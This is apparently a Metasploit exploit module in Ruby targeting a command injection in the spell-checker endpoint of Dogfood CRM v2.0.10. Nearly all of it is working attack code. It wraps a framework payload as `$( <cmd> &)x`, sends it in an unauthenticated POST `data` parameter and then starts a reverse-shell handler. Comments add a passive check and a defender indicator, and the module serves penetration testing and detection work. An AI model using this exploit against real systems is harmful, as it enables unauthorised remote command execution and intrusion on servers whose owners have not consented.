GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/dogfood_spell_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
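# Exploit module for the Dogfood CRM spell.php command injection (v2.0.10).
#
# What the module does, as visible here: an unauthenticated POST to the
# spell-checker URI whose `data` parameter reaches a shell; the payload is
# wrapped as `$( <cmd> &)x`. Quotes are the only bad characters because a
# default PHP install escapes them via magic_quotes_gpc (see 'BadChars').
#
# Defender notes: a POST to the spell-checker path carrying `$(` in the
# request body is the observable indicator of this module. `check` is
# passive — a plain GET that only looks for the "Spell Check complete"
# marker — so it does not confirm the injection itself.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata and the URIPATH option.
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Dogfood CRM spell.php Remote Command Execution',
        'Description' => %q{
          This module exploits a previously unpublished vulnerability in the
          Dogfood CRM mail function which is vulnerable to command injection
          in the spell check feature. Because of character restrictions, this
          exploit works best with the double-reverse telnet payload. This
          vulnerability was discovered by LSO and affects v2.0.10.
        },
        'Author' => [
          'LSO <lso[at]hushmail.com>', # Exploit module
          'aushack', # Added check code, QA tested ok 20090303, there are no references (yet).
        ],
        'License' => BSD_LICENSE,
        'References' => [
          [ 'CVE', '2009-20010' ],
          [ 'OSVDB', '54707' ],
          [ 'URL', 'http://downloads.sourceforge.net/dogfood/' ],
        ],
        'Privileged' => false,
        'Platform' => ['unix'], # aushack - removed win, linux -> untested
        'Arch' => ARCH_CMD,
        'Payload' => {
          'Space' => 1024,
          'DisableNops' => true,
          'BadChars' => %q|'"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install
          'Compat' => {
            'PayloadType' => 'cmd cmd_bash',
            'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
          }
        },
        'Targets' => [['Automatic', {}]],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2009-03-03',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('URIPATH', [ true, "The URI of the spell checker", '/dogfood/mail/spell.php']),
      ]
    )
  end

  # Passive presence check: one GET to URIPATH with no payload and a
  # one-second timeout.
  #
  # @return [Msf::Exploit::CheckCode] Detected when the response body
  #   contains "Spell Check complete"; Safe otherwise, including when no
  #   response came back. Detected only means the spell checker answered —
  #   it does not prove the injection works.
  def check
    res = send_request_raw({ 'uri' => normalize_uri(datastore['URIPATH']) }, 1)

    # `&.` covers both a nil response and a response with no body.
    return Exploit::CheckCode::Detected if res&.body&.match?(/Spell Check complete/)

    Exploit::CheckCode::Safe
  end

  # Delivers the encoded payload through the spell checker's POST `data`
  # parameter, then starts the payload handler.
  #
  # The command is sent as `$( <cmd> &)x`: `$( )` is the injection and `&`
  # backgrounds the command so the request can return; the trailing `x`
  # presumably just gives the spell checker something to check. The request
  # timeout is one second and the HTTP response is deliberately ignored —
  # the module does not need the spell-check output, only the side effect.
  def exploit
    cmd = payload.encoded
    data = "data=#{Rex::Text.uri_encode('$( ' + cmd + ' &)x')}"
    uri = normalize_uri(datastore['URIPATH'])

    send_request_cgi(
      {
        'uri' => uri,
        'method' => "POST",
        'data' => data
      },
      1 # timeout (seconds): don't block waiting for the spell-check page
    )

    handler
  end
end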